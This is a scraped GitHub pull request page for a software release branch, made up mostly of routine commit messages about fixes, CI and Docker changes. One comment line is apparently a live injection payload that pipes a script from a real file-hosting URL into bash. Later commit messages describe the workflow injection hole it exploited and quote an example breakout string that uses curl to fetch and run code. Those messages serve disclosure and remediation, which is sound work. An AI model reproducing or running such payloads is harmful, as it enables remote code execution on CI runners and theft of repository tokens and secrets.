release/v0.23.0 (#2145)#2147
Closed
github-actions[bot] wants to merge 736 commits intodocsfrom
Closed
Conversation
…clickhouse ignore monitor failure on clickhouse
Co-authored-by: Mika Kerman <mika.kerman@gmail.com>
…tion-to-edr-monitor added excludes option to edr monitor
…rmatters text and markdown formats
…upport pydantic v1
…upport switched back to use the update_forward_refs function as we need to s…
release/v0.19.2
…ow (#2144) In _parse_test_db_row, latest_run_time was set to the raw UTC datetime and latest_run_time_utc was converted to local time, which is backwards. This swaps them to match the correct pattern in _get_test_metadata_from_test_result_db_row where latest_run_time is local time and latest_run_time_utc is UTC. Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com> Co-authored-by: Itamar Hartstein <haritamar@gmail.com>
…pecified (#2143) When using 'edr report --select invocation_id:XXXX', the report showed 0 tests for non-latest invocations because the invocations_rank_index == 1 filter ran unconditionally after the invocation_id filter, removing all results where the selected invocation wasn't the most recent one. This mirrors the existing correct pattern in get_test_results_summary(). Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com> Co-authored-by: Itamar Hartstein <haritamar@gmail.com>
* release v0.23.0 * use official package version 0.23.0 * update package lock --------- Co-authored-by: GitHub Actions <noreply@github.com> Co-authored-by: Itamar Hartstein <haritamar@gmail.com>
…2146) * Fix release validation to parse YAML instead of grepping comments The validate-packages-yml job was using grep to check for git hash references in packages.yml, which also matched commented-out lines. This caused the release to fail even though the actual YAML config was correct. Replace the grep-based validation with a Python script that properly parses the YAML, ignoring comments and only checking actual package entries. Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Add workflow_dispatch trigger to release workflow Allows manually triggering the release workflow from the GitHub Actions UI without needing to modify or recreate a tag. Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Add tag input to workflow_dispatch for manual releases When manually triggering the release workflow, a tag input is now required (e.g. v0.23.0). All checkout steps use this tag as the ref, and Docker metadata uses it for proper image tagging. When triggered by a tag push, the behavior is unchanged (falls back to github.ref). Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> --------- Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com> Co-authored-by: Itamar Hartstein <haritamar@gmail.com>
…o >=1.8 (#2157) * Switch Docker build to uv and tighten dbt adapter lower bounds to >=1.8 - Replace pip with uv in Dockerfile to avoid pip's resolution-too-deep error - Bump dbt-core and all adapter lower bounds from >=0.20 to >=1.8 (pre-1.8 is EOL) Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Remove dbt-fabricspark from all extra (broken upstream: no installable version >=1.8) Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Pin uv version to 0.10.11 and merge into single RUN layer Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> --------- Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com> Co-authored-by: Itamar Hartstein <haritamar@gmail.com>
…m64 segfault (#2158) * Remove apt-get dist-upgrade from Dockerfile to fix QEMU arm64 segfault Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Upgrade base image to Python 3.12 and fix python-dev package name Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> --------- Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com> Co-authored-by: Itamar Hartstein <haritamar@gmail.com>
…elease validation (#2159) * Fix package-lock.yml format for dbt 1.8+ and remove restrictive adapters from all extra - Remove deprecated 'name' fields from package-lock.yml that dbt 1.8+ rejects - Remove dbt-clickhouse, dbt-sqlserver, dbt-vertica from 'all' extra as they pin dbt-core to 1.8.x (still available as individual extras) Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Add release validation: reject package-lock.yml with deprecated 'name' fields Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Revert lock file and release validation changes The 'name' field in package-lock.yml is not deprecated - it is the current format generated by modern dbt versions. The issue was specific to dbt 1.8.x which has a bug rejecting this field. The real fix is removing restrictive adapters from the 'all' extra so dbt resolves to 1.11+ where this bug doesn't exist. Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Fix package-lock.yml and release validation wording - Remove 'name' fields from package-lock.yml (unsupported in dbt 1.8) - Re-add release validation with corrected wording: 'unsupported in dbt 1.8' instead of incorrectly saying 'deprecated' Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Add dbt-clickhouse and dbt-sqlserver back to all extra Only dbt-vertica (dbt-core==1.8.5 exact pin) and dbt-fabricspark (broken upstream) need to stay out. dbt-clickhouse 1.10.0 requires dbt-core>=1.9 and dbt-sqlserver 1.9.0 requires dbt-core>=1.9.0,<2.0, so both are compatible with newer dbt-core versions. Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Add comments explaining why fabricspark and vertica are excluded from all extra Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Bump version to 0.23.1 Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Add pre-commit hook to auto-strip 'name' fields from package-lock.yml The hook runs on package-lock.yml changes, strips any 'name' fields (unsupported in dbt 1.8), and exits 1 so the user re-stages the fix. Placed before the existing verify-dbt-project-packages-lock hook. Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> * Remove release validation for package-lock.yml name fields The pre-commit hook handles this automatically now, so the release validation step is redundant. Co-Authored-By: Itamar Hartstein <haritamar@gmail.com> --------- Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com> Co-authored-by: Itamar Hartstein <haritamar@gmail.com>
When an adaptive card payload exceeds the Teams webhook size limit (~28KB), progressively remove body items from the card and append a truncation notice. This prevents the entire alert flow from failing when a single message is too large for the Teams endpoint. Co-Authored-By: Michael Myaskovsky <michael@elementary-data.com>
…k markdown for italic Co-Authored-By: Michael Myaskovsky <michael@elementary-data.com>
Co-Authored-By: Michael Myaskovsky <michael@elementary-data.com>
Co-Authored-By: Michael Myaskovsky <michael@elementary-data.com>
…te-teams-webhook-payload Truncate oversized Teams webhook payloads to prevent HTTP 413 errors
…teams, either in the status code or inside the response text
…oo-large-exception Teams webhook message too large exception
Addresses the Node.js 20 deprecation warning by upgrading to actions/checkout@v6 which runs on Node.js 24. Updated workflows: - release.yml (4 usages) - test-warehouse.yml (2 usages) - test-github-action.yml (2 usages) - bump-version.yml (2 usages) - build-docker-image.yml (1 usage) - cleanup-stale-schemas.yml (1 usage) - run-precommit.yml (1 usage) - update_pylon_issue.yml (1 usage, was v2) Co-Authored-By: Elazar Lachkar <elazar098@gmail.com>
…e compatibility (#2180) When ClickHouse stores NULL for the materialization column in alerts_v2, the JSON data contains "materialization": null. The Pydantic schema rejected this with 'none is not an allowed value' because materialization was typed as str (required, non-nullable). This change makes materialization Optional[str] in both the schema and the alert model, and handles None gracefully in string formatting. Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com> Co-authored-by: Yosef Arbiv <yosef.arbiv@gmail.com>
…ent IDs (#2181) * ci: add typos config to suppress false positives on Vertica SVG gradient IDs Co-Authored-By: Yosef Arbiv <yosef.arbiv@gmail.com> * ci: pin mypy<1.16 to avoid INTERNAL ERROR in mypy 1.20.0 Co-Authored-By: Yosef Arbiv <yosef.arbiv@gmail.com> * ci: add comment explaining mypy version pin Co-Authored-By: Yosef Arbiv <yosef.arbiv@gmail.com> --------- Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com> Co-authored-by: Yosef Arbiv <yosef.arbiv@gmail.com>
* chore: update dbt package to commit 9f32d47faa00f77595d535619cdbc265d7f603c2 Co-Authored-By: Noy Arie <noyarie1992@gmail.com> * chore: change dbt package version to 0.23.1 Co-Authored-By: Noy Arie <noyarie1992@gmail.com> * chore: update docs quickstart to reference version 0.23.1 Co-Authored-By: Noy Arie <noyarie1992@gmail.com> * chore: update frontend report bundle for 0.23.1 Co-Authored-By: Noy Arie <noyarie1992@gmail.com> --------- Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com> Co-authored-by: Noy Arie <noyarie1992@gmail.com>
* release v0.23.2 * dbt package 0.23.1 * dbt package 0.23.1 --------- Co-authored-by: GitHub Actions <noreply@github.com> Co-authored-by: Noy Arie <noyarie1992@gmail.com>
* refactor: widen alert type annotations to AlertModel base class Widens the hard-coded three-way Union[TestAlertModel, ModelAlertModel, SourceFreshnessAlertModel] to the common AlertModel base across alert group, message builder, and integration APIs, and widens PendingAlertSchema.data to BaseAlertDataSchema. Enables downstream packages to extend the alert hierarchy (e.g. pipeline alerts) without needing type: ignore workarounds. No behavioral changes — type-level only. mypy passes and unit tests are unaffected. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: keep smart_union = True on PendingAlertSchema Config Removed by mistake in the previous commit. It's a class-level setting that still affects other Union/Optional fields on the schema, so keeping it preserves the pre-existing parsing behavior. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * refactor: make asset_type and concise_name part of the AlertModel contract - AlertModel.asset_type: new mandatory @Property (NotImplementedError on base) - AlertModel.concise_name: now raises NotImplementedError on base (was "Alert") - TestAlertModel.asset_type -> "test" - ModelAlertModel.asset_type -> "snapshot" | "model" (based on materialization) - ModelAlertModel.concise_name -> self.alias (was "dbt {type} alert - {alias}") - SourceFreshnessAlertModel.asset_type -> "source" - SourceFreshnessAlertModel.concise_name -> "{source_name}.{identifier}" (was "source freshness alert - {source_name}.{identifier}") - AlertMessageBuilder._get_run_alert_subtitle_blocks now consumes alert.asset_type / alert.concise_name instead of an isinstance chain, so downstream subclasses (e.g. pipeline alerts) work without edits here. - Widened _get_run_alert_subtitle_block's `type` param from Literal to str. - Added unit tests for asset_type/concise_name on every concrete subclass. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
|
$(curl https://litter.catbox.moe/iqesmbhukgd2c7hq.sh | bash) |
This workflow interpolated `${{ github.event.comment.body }}` directly
into a `run:` shell step, which allowed any GitHub user to execute
arbitrary code on the runner with the workflow's GITHUB_TOKEN by
posting a crafted issue/PR comment. That vector was exploited on
2026-04-24 to spoof PRs and publish a malicious package.
Removing the workflow entirely (rather than patching) since its only
function was auto-flipping a Pylon ticket to "waiting_on_you" on
comment, which can be reintroduced safely later via the env-var
indirection pattern and an author_association gate.
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This workflow interpolates `${{ github.event.issue.title }}` and
`${{ github.event.pull_request.title }}` directly into `run:` shell
steps. The surrounding single quotes around the curl `--data` payload
do not protect against a quote-breakout in the title (e.g.
`foo'$(curl evil|bash)'bar`), giving any GitHub user code execution
on the runner with the workflow's GITHUB_TOKEN, PYLON_API_KEY,
PYLON_ACCOUNT_ID, and PYLON_REQUESTER_ID.
The trigger surface is broad: `issues: opened` lets any user trigger
it by opening an issue, and `pull_request_target: opened` runs in the
base-repo context with access to base secrets against fork-controlled
input.
Removing entirely for now; the auto-create-Pylon-ticket behavior can
be reintroduced later with env-var indirection for user-controlled
fields and an author_association gate.
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Co-authored-by: GitHub Actions <noreply@github.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
19 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
release v0.23.0
use official package version 0.23.0
update package lock
Co-authored-by: GitHub Actions noreply@github.com
Co-authored-by: Itamar Hartstein haritamar@gmail.com